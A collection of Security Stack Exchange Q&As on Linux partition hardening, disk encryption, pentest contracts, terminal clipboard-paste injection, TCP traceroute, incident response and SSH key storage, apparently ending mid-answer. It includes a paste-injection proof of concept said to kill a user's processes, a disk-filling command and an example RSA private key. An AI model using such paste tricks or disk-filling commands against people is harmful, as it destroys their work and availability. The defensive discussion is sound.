"https://security.stackexchange.com/questions/38691",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/22291/"
]
} |
38,793 | I recently acquired a netbook to play with, and I want to install Kali Linux so I can start learning about network security and exploit development. I want to use this to learn as much about security as I can. What is the best way to partition a Linux box so that it is most resistant to a security risk? Is a single partition containing all of the folders in Linux really that bad? Extra points if you can go into details about the threats possible. I want to learn as much as possible. | Please keep in mind the Holy Trinity of Information Security: C(onfidentiality), I(ntegrity), and A(vailability). So when we talk about configuration hardening you need to consider the technology you're working with, the information being protected, how the information is used within the organization, and the threats. Based on those answers, and possibly others, you can begin to determine which of the tenets are most important and what to focus on. At the filesystem level you're typically most interested in Integrity and Availability. The Confidentiality of the information should probably be handled at a different layer, but how you lay out your filesystems and how you use them should make sure that the information is both trustworthy and is always available when it's needed. One thing to keep in mind when laying out your partitions is failure modes. Typically that question is of the form: "What happens when partition x fills up?" What happens if your partition storing the OS is full? Strange things sometimes happen when / fills up. Sometimes the system hangs. Sometimes no new login sessions can occur. Sometimes the system refuses to boot. Of all the failure modes this one is the hardest to strictly characterize, as its symptoms are the most likely to change based on OS, kernel version, configuration, etc. Some filesystems, particularly the ext line, reserve a certain amount of space when the filesystem is created. This reserved space can only be used by the root user and is intended to allow the systems administrator to still operate and clean out space. What happens if your partition storing logs is full? You lose auditing/reporting data, and this is sometimes used by attackers to hide their activity. In some cases your system will not authenticate new users if it can't record their login event. What happens on an RPM-based system when /var is full? The package manager will not install or update packages and, depending on your configuration, may fail silently. Filling up a partition is easy, especially when a user is capable of writing to it. For fun, run this command and see how quickly you can make a pretty big file: cat /dev/zero > zerofile . It goes beyond filling up partitions as well: when you place locations on different mount points you can also customize their mount options. What happens when /dev/ is not mounted with noexec ? Since /dev is typically assumed to be maintained by the OS and only contain devices, it was frequently (and sometimes still is) used to hide malicious programs. Leaving off noexec allows you to launch binaries stored there. For all these reasons, and more, many hardening guides will discuss partitioning as one of the first steps to be performed. In fact, if you are building a new server, how to partition the disk is very nearly the first thing you have to decide on, and often the most difficult to later change. There exists a group called the Center for Internet Security that produces gobs of easy-to-read configuration guides.
You can likely find a guide for your specific operating system and see what specific recommendations it makes. If we look at Red Hat Enterprise Linux 6, the recommended partitioning scheme is this: # Mount point Mount options
/tmp nodev,nosuid,noexec
/var
/var/tmp bind (/tmp)
/var/log
/var/log/audit
/home nodev
/dev/shm nodev,nosuid,noexec The principle behind all of these changes is to prevent them from impacting each other and/or to limit what can be done on a specific partition. Take the options for /tmp for example. What that says is that no device nodes can be created there, no programs can be executed from there, and the set-uid bit can't be set on anything. By its very nature, /tmp is almost always world-writable and is often a special type of filesystem that only exists in memory. This means that an attacker could use it as an easy staging point to drop and execute malicious code; crashing (or simply rebooting) the system will then wipe clean all the evidence. Since /tmp doesn't require any of that functionality, we can easily disable the features and prevent that situation. The log storage places, /var/log and /var/log/audit , are carved off to help buffer them from resource exhaustion. Additionally, auditd can perform some special things (typically in higher security environments) when its log storage begins to fill up. By placing it on its own partition this resource detection performs better. To be more verbose, and to quote mount(8) , this is exactly what the options used above do: noexec Do not allow direct execution of any binaries on the mounted file system. (Until recently it was possible to run binaries anyway using a command like /lib/ld*.so
/mnt/binary. This trick fails since Linux 2.4.25 / 2.6.0.) nodev Do not interpret character or block special devices on the file system. nosuid Do not allow set-user-identifier or set-group-identifier bits to take effect. (This seems safe, but is in fact rather unsafe if you have suidperl(1) installed.) From a security perspective these are very good options to know since they'll allow you to put protections on the filesystem itself. In a highly secure environment you may even add the noexec option to /home . It'll make it harder for your standard user to write shell scripts for processing data, say analyzing log files, but it will also prevent them from executing a binary that will elevate privileges. Also, keep in mind that the root user's default home directory is /root . This means it will be in the / filesystem, not in /home . Exactly how much you give to each partition can vary greatly depending on the systems workload. A typical server that I've managed will rarely require person interaction and as such the /home partition doesn't need to be very big at all. The same applies to /var since it tends to store rather ephemeral data that gets created and deleted frequently. However, a web server typically uses /var/www as its playground, meaning that either that needs to be on a separate partition as well or /var/ needs to be made big. In the past I have recommended the following as baselines. # Mount Point Min Size (MB) Max Size (MB)
/ 4000 8000
/home 1000 4000
/tmp 1000 2000
/var 2000 4000
swap 1000 2000
/var/log/audit 250 These need to be reviewed and adjusted according to the system's purpose, and how your environment operates. I would also recommend using LVM and against allocating the entire disk. This will allow you to easily grow, or add, partitions if such things are required. | {
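To make the mount options above concrete, an /etc/fstab along the following lines applies them; the device names are placeholders, and you can trial an option on a running system with a remount before committing it:
# /etc/fstab excerpt (illustrative only)
/dev/vg0/lv_tmp   /tmp       ext4    defaults,nodev,nosuid,noexec   1 2
/dev/vg0/lv_home  /home      ext4    defaults,nodev                 1 2
/tmp              /var/tmp   none    bind                           0 0
# Test the effect live, without rebooting:
mount -o remount,nodev,nosuid,noexec /tmp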
"source": [
"https://security.stackexchange.com/questions/38793",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6372/"
]
} |
39,080 | I recently installed Kubuntu and I noticed the option for having an encrypted LVM. The behavior suggests it's full disk encryption since I need to put in a password before I can boot. This article and others I have read suggest it's full disk encryption. Is this actually full disk encryption? If so what type of encryption does it use? or is it just a password I have to put in before it hits grub or lilo but the disk itself is unencrypted. The only reason I don't believe this is full disk encryption is because the only full disk encryption software I've used before was truecrypt which took hours to encrypt a hard drive and when I did something crazy like AES>Serpent>Blowfish the machine would be noticeably slower. Kubuntu's encryption didn't take 4 hours to setup and the machine doesn't seem slower at all. | LVM operates below the filesystem, so whatever it does, it does so at the disk level. So yes, indeed, when LVM implements encryption this is "full-disk encryption" (or, more accurately, "full-partition encryption"). Applying encryption is fast when it is done upon creation : since the initial contents of the partition are ignored, they are not encrypted; only new data will be encrypted as it is written. However, when applying encryption on an existing volume (as is typical of TrueCrypt ) requires reading, encrypting and writing back all used data sectors; this includes sectors which were previously in use, even if they are not in use right now, because they may contain excerpts of some files which were later on copied around. So that kind of after-the-fact application of encryption requires reading and rewriting the whole volume. A mechanical harddisk will run at about 100 MB/s, so a 1 TB volume will need 6 hours (3 for reading, 3 for writing). The encryption itself needs not be slow, at least if it has been properly implemented. A basic PC will be able to encrypt data at more than 100 MB/s, with AES, using a single core (my underpowered laptop achieves 120 MB/s); with recent x86 cores offering the AES-NI instructions , 1 GB/s is reachable. Thus, the CPU can keep pace with the disk, and, most of the time, the user will not notice any slowdown. Of course, if you do "something crazy" like cascading algorithms, well, you've done something crazy and you will have to pay for it. Cascading three algorithms means having to compute all three whenever you read or write data. AES is fast; Serpent not so (about twice slower). In any case, cascading encryption algorithms is not a very rational idea . By default, "encrypted LVM volume" in Linux will rely on dm-crypt , which is configurable (several algorithms are supported) but does not indulge into voodooistic cascades, and that's a blessing. (This does show one of the little paradoxes of security: if it is too transparent and efficient, then people get nervous. For the same reason, medicine pills must taste foul.) | {
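If you are curious why the overhead is barely noticeable on your own hardware, recent cryptsetup releases include a benchmark, and luksDump shows how an existing encrypted volume was set up; the device name is a placeholder:
# Measure raw cipher throughput in memory, no disk involved:
cryptsetup benchmark
# Show the cipher, mode and key size of an existing LUKS container:
cryptsetup luksDump /dev/sda5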
"source": [
"https://security.stackexchange.com/questions/39080",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/27595/"
]
} |
39,101 | Today I experienced a situation where a person responsible for the security of a company required a pentesting company to withdraw a clause in the contract that says that: "during the pentest there exist the possibility to delete or modify sensitive data in the production environment unintentionally due to the execution of some tools, exploits, techniques, etc." The client says that he is not going to accept that clause and that he believes that no company would accept that clause. He thinks that during a pentest information could be accessed but never deleted or modified. We know that the execution of some tools like web crawlers or spiders can delete data if the web application is very badly programmed, so the possibility always exists if those types of tools are going to be used. I know that these are the conditions of the client, and should be accepted, but: Can a skilled and professional pentester always assure that no data will be deleted or modified in production during a pentest? Can a pentest really be done if the pentest team has the limitation that data cannot be created nor modified? Should the pentesting company always include the disclaimer clause just in case? | There's no way that a pentester can 100% assure that data will not be modified or deleted, in the same way as they can't assure that system availability won't be affected (I've knocked systems over with a port scan or a single ' character). as you say a web crawler can delete data from a system if it's been set-up badly. I'd say that what should be said is something like "every care will be taken to ensure that the testing does not negatively affect the systems under review and no deliberate attempts will be made to modify or delete production data or to negatively affect the availability of in-scope systems. However with all security testing there is a risk that systems will be affected and the customer should ensure that backups of all data and systems are in place prior to the commencement of the review" | {
"source": [
"https://security.stackexchange.com/questions/39101",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/22291/"
]
} |
39,118 | Clipboard abuse from websites Many websites use JavaScript or CSS to stealthily insert or replace text in the user's clipboard whenever they copy information from the page. As far as I know this is mostly used for advertising purposes, but PoC for exploits have been demonstrated. However I discovered that one does not even need JS or CSS to craft an exploit that has malicious effects when pasted in a terminal. Pasting hidden backspace characters can change the whole meaning of a shell command. Pasting in a term-based editor isn't safe either. Pasting Esc then :! can cause a running Vim instance to execute a shell command. Pasting ^X^C will quit Emacs and/or even cat . Pasting ^Z will stop mostly any term-based editor and return to the shell. What makes it worse is that many trusted websites do not sanitise these non-printable characters. Twitter filters out Esc but not backspace. Pastebin.com doesn't appear to filter out anything. Neither does Stack Exchange , hence the following exploit ( WARNING: malicious code, DO NOT copy and paste into a Unix terminal!! ) that could very well be crafted into something worse and more likely to be pasted by a victim: echo '.!: keS i3l ldKo -1+9 +2-1' > /tmp/lol
echo ':!. keS i3l ldKo -2+9 +7-1' >> /tmp/lol
echo '.:! keS i3l ldKo -3+9 +4-1' >> /tmp/lol
sleep 1
md5sum /tmp/lol Edit : Raw backspaces are now filtered by Stack Exchange, so this PoC requires &# escapes. /Edit Here is how Chrome renders it: Firefox isn't fooled as easily, but still remains oblivious to the JS or CSS approach: And when pasted into a terminal, it just kills all the user’s processes. What to do? What this basically tells me is that I should never, ever, copy anything from a web page and paste it into a terminal application. Well, great. My work environment is basically 1 web browser and 40 terminal windows/tabs. I copy and paste code snippets all the time. Now, is there anyone who can protect me from my own bad habits (which, honestly, I don’t think are that bad)? Browser vendors? Terminal vendors? Clipboard system vendors? A third-party application maybe? | You might have guessed this, but never use the terminal's pasting functionality to paste things into vim/emacs . It's like sending a batch of commands to the editor, which can do anything. For these reasons, editors have their own copy-pasting functionality, which cannot be injected. For instance, in vim, you should use the + register to exchange data with the system clipboard ( "+p for pasting). Regarding the shell or other terminal applications: it has been established that you must not paste unsafe data into your terminal. There is a safe-paste plugin for zsh, which prevents code from actually running when pasted, but someone has already exploited it anyway. Also, a similar question (about accidental pasting) has been asked on apple.se. Most of the solutions might also work for you. Update: In vim, if set mouse=a is used, pasting with the middle mouse button is safe. You can still paste with shift-Insert though. | {
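One mitigation that has since become widely available is "bracketed paste", where the terminal marks pasted text so that programs insert it literally instead of executing it line by line; whether the settings below are honoured depends on your readline and vim versions, so treat this as a sketch:
# readline-based programs (bash and many others), needs readline >= 7.0:
echo 'set enable-bracketed-paste on' >> ~/.inputrc
# vim: route middle-click pastes through vim's own (non-executing) handling:
echo 'set mouse=a' >> ~/.vimrc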
"source": [
"https://security.stackexchange.com/questions/39118",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6480/"
]
} |
39,178 | There is a utility called tcptraceroute , and this enhancement called intrace that is used just like a standard traceroute, but it works over TCP. How is the syn flag in TCP used to achieve traceroute like functionality (when ICMP is off) What information can be disclosed (or other risks)? How can this be mitigated? (routers, hosts, ...both?) This has been described as similar to the nmap command when passed the -sS flag. If this is accurate, what does it actually mean? | All the tracerouting tools rely on the following principle: they send packets with a short life, and wait for ICMP packets reporting the death of these packets. An IP packet has a field called "TTL" (as "Time To Live") which is decremented at each hop; when it reaches 0, the packet dies, and the router on which this happens is supposed to send back a "Time Exceeded" ICMP message . That ICMP message contains the IP address of the said router, thus revealing it. None of the tools you link to can do anything if some firewall blocks the "Time Exceeded" ICMP packets. However, blocking such packets tend to break the Internet (because hosts adaptively change the TTL in the packets they send in order to cope with long network paths, and they need these ICMP for this process), so, on a general basis, the "Time Exceeded" ICMP packets are not blocked. What is often blocked , however, is the kind of short-lived packets that traceroute sends. These are the packets with the artificially low TTL. If they are blocked by a firewall, they never get to die "of old age", and thus no Time Exceeded ICMP. For TTL-processing and the "Time Exceeded" ICMP, the type of packet does not matter; this occurs at the IP level. But firewalls also look at packet contents. The goal is to fool firewalls so that they allow the short-lived packet to flow (and then die). Plain traceroute uses either UDP packets, or ICMP "Echo" packets, both kinds being routinely blocked by (over)zealous sysadmins. tcptraceroute instead uses a TCP "SYN" packet, i.e. the kind of packet that would occur as first step in the TCP "three-way handshake". That kind of packet is not usually blocked by firewall, at least as long as the destination port is "allowed". tcptraceroute will not complete any TCP handshake; it just relies on the ideas that SYN packets are not shot on sight by firewalls. intrace goes one step further in that it waits for an existing TCP connection (it does so by inspecting all packets, à la tcpdump ). When it sees a connection, and the user presses ENTER, intrace will send short-live packets which appear as being part of the observed connection. intrace can do that because it has seen the packets, and so knows the IP addresses, ports and sequence numbers. All relevant firewalls will let these packets pass, since they (obviously) allow the observed TCP connection to proceed. The short-lived packets are adjusted so that they will not disrupt the TCP connection (i.e. they are simple "ACK" packets with no data by themselves, so the destination OS will simply ignore them). Edit: I notice that I did not answer part of the question. Here it goes: there is no risk. There is nothing to mitigate. traceroute reveals IP addresses of routers involved in routing packets. 
IP addresses are not meant to be secret and are rather easy to obtain for attackers through various means (mass scanning comes to mind, but also searching garbage bags for printouts of network maps -- the modern fashion of recycling makes dumpster diving a much easier and cleaner activity than what it used to be). However, a relatively widespread myth is that keeping your addresses secret somehow ensures security. Correspondingly, many sysadmins consider traceroute as a serious breach, to be fixed and blocked as soon as possible. In practice, though, this is all baloney. If revealing a few internal IP addresses is a major issue, then this means that your network is doomed. Worrying about secrecy of IP addresses is like triggering a major incident response plan because an outsider learned the menu at the company's cafeteria. It is disproportionate. Granted, having precise and extensive knowledge of the network infrastructure can only help attackers; but not in really significant amounts. Keeping IP addresses secret is not worth breaking connectivity through excessive filtering (for instance, blocking the "fragmentation required" ICMP is deadly for any client behind an ADSL+PPPoE link). | {
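In practice the short-TTL trick described above can be driven from several tools; which of these your system ships (and whether they need root) varies, so the invocations below are illustrative:
# Classic traceroute (UDP or ICMP probes), often filtered by firewalls:
traceroute example.com
# The same TTL trick carried in TCP SYN packets towards an allowed port:
tcptraceroute example.com 443
# Many Linux traceroute builds can also do TCP SYN probes natively:
traceroute -T -p 443 example.com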
"source": [
"https://security.stackexchange.com/questions/39178",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/396/"
]
} |
39,231 | I suspect that one or more of my servers is compromised by a hacker, virus, or other mechanism: What are my first steps? When I arrive on site should I disconnect the server, preserve "evidence", are there other initial considerations? How do I go about getting services back online? How do I prevent the same thing from happening immediately again? Are there best practices or methodologies for learning from this incident? If I wanted to put a Incident Response Plan together, where would I start? Should this be part of my Disaster Recovery or Business Continuity Planning? This is meant to be a canonical post for this topic. Originally from serverfault . | Originally from serverfault. Thanks to Robert Moir (RobM) It's hard to give specific advice from what you've posted here but I do have some generic advice based on a post I wrote ages ago back when I could still be bothered to blog. Don't Panic First things first, there are no "quick fixes" other than restoring your system from a backup taken prior to the intrusion, and this has at least two problems. It's difficult to pinpoint when the intrusion happened. It doesn't help you close the "hole" that allowed them to break in last time, nor deal with the consequences of any "data theft" that may also have taken place. This question keeps being asked repeatedly by the victims of hackers breaking into their web server. The answers very rarely change, but people keep asking the question. I'm not sure why. Perhaps people just don't like the answers they've seen when searching for help, or they can't find someone they trust to give them advice. Or perhaps people read an answer to this question and focus too much on the 5% of why their case is special and different from the answers they can find online and miss the 95% of the question and answer where their case is near enough the same as the one they read online. That brings me to the first important nugget of information. I really do appreciate that you are a special unique snowflake. I appreciate that your website is too, as it's a reflection of you and your business or at the very least, your hard work on behalf of an employer. But to someone on the outside looking in, whether a computer security person looking at the problem to try and help you or even the attacker himself, it is very likely that your problem will be at least 95% identical to every other case they've ever looked at. Don't take the attack personally, and don't take personally the recommendations that follow here or that you get from other people. If you are reading this after just becoming the victim of a website hack then I really am sorry, and I really hope you can find something helpful here, but this is not the time to let your ego get in the way of what you need to do. You have just found out that your server(s) got hacked. Now what? Do not panic. Absolutely do not act in haste, and absolutely do not try and pretend things never happened and not act at all. First: understand that the disaster has already happened. This is not the time for denial; it is the time to accept what has happened, to be realistic about it, and to take steps to manage the consequences of the impact. Some of these steps are going to hurt, and (unless your website holds a copy of my details) I really don't care if you ignore all or some of these steps, but doing so will make things better in the end. The medicine might taste awful but sometimes you have to overlook that if you really want the cure to work. 
Stop the problem from becoming worse than it already is: The first thing you should do is disconnect the affected systems from the Internet. Whatever other problems you have, leaving the system connected to the web will only allow the attack to continue. I mean this quite literally; get someone to physically visit the server and unplug network cables if that is what it takes, but disconnect the victim from its muggers before you try to do anything else. Change all your passwords for all accounts on all computers that are on the same network as the compromised systems. No really. All accounts. All computers. Yes, you're right, this might be overkill; on the other hand, it might not. You don't know either way, do you? Check your other systems. Pay special attention to other Internet facing services, and to those that hold financial or other commercially sensitive data. If the system holds anyone's personal data, immediately inform the person responsible for data protection (if that's not you) and URGE a full disclosure. I know this one is tough. I know this one is going to hurt. I know that many businesses want to sweep this kind of problem under the carpet but the business is going to have to deal with it - and needs to do so with an eye on any and all relevant privacy laws. However annoyed your customers might be to have you tell them about a problem, they'll be far more annoyed if you don't tell them, and they only find out for themselves after someone charges $8,000 worth of goods using the credit card details they stole from your site. Remember what I said previously? The bad thing has already happened. The only question now is how well you deal with it. Understand the problem fully: Do NOT put the affected systems back online until this stage is fully complete, unless you want to be the person whose post was the tipping point for me actually deciding to write this article. I'm not going to link to that post so that people can get a cheap laugh, but the real tragedy is when people fail to learn from their mistakes. Examine the 'attacked' systems to understand how the attacks succeeded in compromising your security. Make every effort to find out where the attacks "came from", so that you understand what problems you have and need to address to make your system safe in the future. Examine the 'attacked' systems again, this time to understand where the attacks went, so that you understand what systems were compromised in the attack. Ensure you follow up any pointers that suggest compromised systems could become a springboard to attack your systems further. Ensure the "gateways" used in any and all attacks are fully understood, so that you may begin to close them properly. (e.g. if your systems were compromised by a SQL injection attack, then not only do you need to close the particular flawed line of code that they broke in by, you would want to audit all of your code to see if the same type of mistake was made elsewhere). Understand that attacks might succeed because of more than one flaw. Often, attacks succeed not through finding one major bug in a system but by stringing together several issues (sometimes minor and trivial by themselves) to compromise a system. For example, using SQL injection attacks to send commands to a database server, discovering the website/application you're attacking is running in the context of an administrative user and using the rights of that account as a stepping-stone to compromise other parts of a system. 
Or as hackers like to call it: "another day in the office taking advantage of common mistakes people make". Why not just "repair" the exploit or rootkit you've detected and put the system back online? In situations like this the problem is that you don't have control of that system any more. It's not your computer any more. The only way to be certain that you've got control of the system is to rebuild the system. While there's a lot of value in finding and fixing the exploit used to break into the system, you can't be sure about what else has been done to the system once the intruders gained control (indeed, it's not unheard of for hackers that recruit systems into a botnet to patch the exploits they used themselves, to safeguard "their" new computer from other hackers, as well as installing their rootkit). Make a plan for recovery and to bring your website back online and stick to it: Nobody wants to be offline for longer than they have to be. That's a given. If this website is a revenue generating mechanism then the pressure to bring it back online quickly will be intense. Even if the only thing at stake is your / your company's reputation, this is still going generate a lot of pressure to put things back up quickly. However, don't give in to the temptation to go back online too quickly. Instead move as fast as possible to understand what caused the problem and to solve it before you go back online or else you will almost certainly fall victim to an intrusion once again, and remember, "to get hacked once can be classed as misfortune; to get hacked again straight afterward looks like carelessness" (with apologies to Oscar Wilde). I'm assuming you've understood all the issues that led to the successful intrusion in the first place before you even start this section. I don't want to overstate the case but if you haven't done that first then you really do need to. Sorry. Never pay blackmail / protection money. This is the sign of an easy mark and you don't want that phrase ever used to describe you. Don't be tempted to put the same server(s) back online without a full rebuild. It should be far quicker to build a new box or "nuke the server from orbit and do a clean install" on the old hardware than it would be to audit every single corner of the old system to make sure it is clean before putting it back online again. If you disagree with that then you probably don't know what it really means to ensure a system is fully cleaned, or your website deployment procedures are an unholy mess. You presumably have backups and test deployments of your site that you can just use to build the live site, and if you don't then being hacked is not your biggest problem. Be very careful about re-using data that was "live" on the system at the time of the hack. I won't say "never ever do it" because you'll just ignore me, but frankly I think you do need to consider the consequences of keeping data around when you know you cannot guarantee its integrity. Ideally, you should restore this from a backup made prior to the intrusion. If you cannot or will not do that, you should be very careful with that data because it's tainted. You should especially be aware of the consequences to others if this data belongs to customers or site visitors rather than directly to you. Monitor the system(s) carefully. You should resolve to do this as an ongoing process in the future (more below) but you take extra pains to be vigilant during the period immediately following your site coming back online. 
The intruders will almost certainly be back, and if you can spot them trying to break in again you will certainly be able to see quickly if you really have closed all the holes they used before plus any they made for themselves, and you might gather useful information you can pass on to your local law enforcement. Reducing the risk in the future. The first thing you need to understand is that security is a process that you have to apply throughout the entire life-cycle of designing, deploying and maintaining an Internet-facing system, not something you can slap a few layers over your code afterwards like cheap paint. To be properly secure, a service and an application need to be designed from the start with this in mind as one of the major goals of the project. I realise that's boring and you've heard it all before and that I "just don't realise the pressure man" of getting your beta web2.0 (beta) service into beta status on the web, but the fact is that this keeps getting repeated because it was true the first time it was said and it hasn't yet become a lie. You can't eliminate risk. You shouldn't even try to do that. What you should do however is to understand which security risks are important to you, and understand how to manage and reduce both the impact of the risk and the probability that the risk will occur. What steps can you take to reduce the probability of an attack being successful? For example: Was the flaw that allowed people to break into your site a known bug in vendor code, for which a patch was available? If so, do you need to re-think your approach to how you patch applications on your Internet-facing servers? Was the flaw that allowed people to break into your site an unknown bug in vendor code, for which a patch was not available? I most certainly do not advocate changing suppliers whenever something like this bites you because they all have their problems and you'll run out of platforms in a year at the most if you take this approach. However, if a system constantly lets you down then you should either migrate to something more robust or at the very least, re-architect your system so that vulnerable components stay wrapped up in cotton wool and as far away as possible from hostile eyes. Was the flaw a bug in code developed by you (or someone working for you)? If so, do you need to re-think your approach to how you approve code for deployment to your live site? Could the bug have been caught with an improved test system, or with changes to your coding "standard" (for example, while technology is not a panacea, you can reduce the probability of a successful SQL injection attack by using well-documented coding techniques). Was the flaw due to a problem with how the server or application software was deployed? If so, are you using automated procedures to build and deploy servers where possible? These are a great help in maintaining a consistent "baseline" state on all your servers, minimising the amount of custom work that has to be done on each one and hence hopefully minimising the opportunity for a mistake to be made. Same goes with code deployment - if you require something "special" to be done to deploy the latest version of your web app then try hard to automate it and ensure it always is done in a consistent manner. Could the intrusion have been caught earlier with better monitoring of your systems? 
Of course, 24-hour monitoring or an "on call" system for your staff might not be cost effective, but there are companies out there who can monitor your web facing services for you and alert you in the event of a problem. You might decide you can't afford this or don't need it and that's just fine... just take it into consideration. Use tools such as tripwire and nessus where appropriate - but don't just use them blindly because I said so. Take the time to learn how to use a few good security tools that are appropriate to your environment, keep these tools updated and use them on a regular basis. Consider hiring security experts to 'audit' your website security on a regular basis. Again, you might decide you can't afford this or don't need it and that's just fine... just take it into consideration. What steps can you take to reduce the consequences of a successful attack? If you decide that the "risk" of the lower floor of your home flooding is high, but not high enough to warrant moving, you should at least move the irreplaceable family heirlooms upstairs. Right? Can you reduce the amount of services directly exposed to the Internet? Can you maintain some kind of gap between your internal services and your Internet-facing services? This ensures that even if your external systems are compromised the chances of using this as a springboard to attack your internal systems are limited. Are you storing information you don't need to store? Are you storing such information "online" when it could be archived somewhere else. There are two points to this part; the obvious one is that people cannot steal information from you that you don't have, and the second point is that the less you store, the less you need to maintain and code for, and so there are fewer chances for bugs to slip into your code or systems design. Are you using "least access" principles for your web app? If users only need to read from a database, then make sure the account the web app uses to service this only has read access, don't allow it write access and certainly not system-level access. If you're not very experienced at something and it is not central to your business, consider outsourcing it. In other words, if you run a small website talking about writing desktop application code and decide to start selling small desktop applications from the site then consider "outsourcing" your credit card order system to someone like Paypal. If at all possible, make practicing recovery from compromised systems part of your Disaster Recovery plan. This is arguably just another "disaster scenario" that you could encounter, simply one with its own set of problems and issues that are distinct from the usual 'server room caught fire'/'was invaded by giant server eating furbies' kind of thing. ... And finally I've probably left out no end of stuff that others consider important, but the steps above should at least help you start sorting things out if you are unlucky enough to fall victim to hackers. Above all: Don't panic. Think before you act. Act firmly once you've made a decision, and leave a comment below if you have something to add to my list of steps. | {
"source": [
"https://security.stackexchange.com/questions/39231",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/3339/"
]
} |
39,279 | I configured my server to encrypt user passwords using 500,000 rounds of SHA-512. The question is, how does the standard AES-128-CBC encrypted SSH private key stack up to that, provided the same (or similar length) password/passphrase is used? This must be a human-typeable passphrase, of course, and the lack of entropy in this is (hopefully) the weakest link here. My understanding is that key-strengthening will extend the effort required to brute-force the passphrase, no matter how weak the passphrase is. It's clear to me that since the public key is public, and can be used to verify the private key, the security of that private key will depend on the passphrase (the length of the RSA key will not factor in to how easy it is to reveal it). I imagine that check would be quite fast, so I would ideally want to increase the number of rounds and use stronger cipher suites so that the process of bruteforcing the passphrase is slowed down. How much extra security on the passphrase can be gained by using PKCS#8 for a SSH private key? I'm also wondering about ways to potentially improve upon this. Is there a way to make this encryption openssl pkcs8 -topk8 -v2 des3 use even more rounds than the default (and still be accepted by ssh )? Also, are there even stronger suites that can be used? I'm dealing with Centos 6.4 here for now (since I like kickstart scripts), so it's probably a good idea not to be messing with the secure program suite if I can help it, but maybe there exists an even stronger symmetric cipher suite than PKCS#8 that can be used? One thing I noticed is that the PBKDF2 here doesn't seem to specify the underlying hash used. Looking at the list it doesn't get any better than SHA1 it seems. I want to find a way to make the best use of the ~0.5 second tolerable for successful authentication to help maximize the amount of computation required for brute-forcing. I guess if I really cared about strengthening I should be looking at scrypt , but there is no native support in the tools for it, so this can't be used for day-to-day SSH private key management (but it could be suitable for use in special applications). Edit: Interesting. My encrypted private-key on CentOS looks like this: -----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,D3A046CD... I suppose this isn't necessarily any worse than AES-128-CBC (which is what my Mac produced). | What happens for private key storage is a bit intricate because it involves several layers of underspecified crud accumulated over years and kept for backward compatibility. Let's unravel the mystery. For its cryptographic operations, including private key storage (that which we are presently interested in), OpenSSH relies on the OpenSSL library . So OpenSSH will support what OpenSSL supports. A private key is a bunch of mathematical objects which can be encoded in a structure which is, normally, binary (i.e. a bunch of bytes , not printable characters ). Let's assume a RSA key. The format for a RSA private key is defined in PKCS#1 as an ASN.1 structure which will be encoded using the DER encoding rules. Since a lot of crypto-related tools began their life in the early and mid-1990s and, at that time, email was most fashionable (the Web was still young), tools strived at using characters which could be pasted into an email (attached files were not yet common in these days). Notably, there was an early standard called Privacy-enhanced Electronic Mail , or "PEM". That standard was never really deployed or used, and other systems trumped it (namely PGP and S/MIME ), but one feature of PEM stuck: a way to encode binary object into printable text. This is the PEM format . It looks like this: -----BEGIN SOMETHING-----
Some-optional: headers
Base64+Encoded+Data==
-----END SOMETHING----- So PEM is a kind of wrapper with the binary data being encoded in Base64 , and header and footer lines added, which include a type (the "SOMETHING"). The "optional headers" is a later addition of OpenSSL, and it has never been standardized, so PEM-with-headers is documented only as "what OpenSSL does". OpenSSL documentation being what it is, this means that, in order to know what this process exactly entails, you have to dive in the dreaded OpenSSL source code. Here is an unencrypted RSA private key, in PEM format: -----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQDQ33ndDr5N/AI8y2PzrqGbadLeS5fSf2GsVJx2B2KxhazL2z5O
ufin+wjJ1hW12/zWyQs/9CFYQFrife+PrMUOdLitsmlD3l4lBQ29+XKsmPabtINP
JQ0n4dxgBGeFxTCd4lJwiysmVsXPnNrgQTcx2nirrIk1C7wSW9Ai9W3fZQIDAQAB
AoGBAKiKSvkW9nRSzzNjIwn0da7EG0UIVj+iTZwSwhVzLC32oVH1XTeFVKGnLJZA
y0/tbP2bSBqY0Xc2pp9v4yhZzr6/BUPX+N1FOW8Q5OXHMD4fXSixrX0vYOT8hQuC
ehTAXsStjkZqzCdCsKV9YIduTHoyjL2jG6QBvFQK7kHaYUwZAkEA+rp2b+eBDJrg
lqcPOE2HkCkQcReSW0OIoUgd2tIiPFL8HSNwKvvAAH+QBKL6jvecLswJneecon8Z
jsgn4K/EpwJBANVDultbYq/h3F5FbAQ4r6cMQ2ZmmhMFdt8rRvAdEz18CuobGvAQ
y31hU/InW0n+Z0oHCsIgyowSeCGwRLMJYRMCQGKDXQG+/k+Lku7emPZQUBFucQ1e
a5z8PfTQtxpBMj5thK2WPP5GiDwp4tZPiw8dbvpcJPMsC7k1Iz+cmT6JEUUCQBxz
X54mb+D06bgt3L4nbc+ERE2Z7H4TIYueM2V/C30NWktm+E4Ef5EnddJ9S6Fwbgkj
LV0+kKblI9+iq1eTLb8CQQC+QDF7Y1o4IpDGcu+3WhS/pI/CkXD2pDMJM6rGBgG6
g9D1VTPCx0LZAWK4GdmELhPM+0ePH4P24/VsJY4mvutQ
-----END RSA PRIVATE KEY----- As you can see, the type is "RSA PRIVATE KEY". The ASN.1 structure can be explored with openssl asn1parse : $ openssl asn1parse -i -in keyraw.pem
0:d=0 hl=4 l= 605 cons: SEQUENCE
4:d=1 hl=2 l= 1 prim: INTEGER :00
7:d=1 hl=3 l= 129 prim: INTEGER :D0DF79DD0EBE4DFC023CCB63F3AEA19B69D2DE4B97D27F61AC549C760762B185ACCBDB3E4EB9F8A7FB08C9D615B5DBFCD6C90B3FF42158405AE27DEF8FACC50E74B8ADB26943DE5E25050DBDF972AC98F69BB4834F250D27E1DC60046785C5309DE252708B2B2656C5CF9CDAE0413731DA78ABAC89350BBC125BD022F56DDF65
139:d=1 hl=2 l= 3 prim: INTEGER :010001
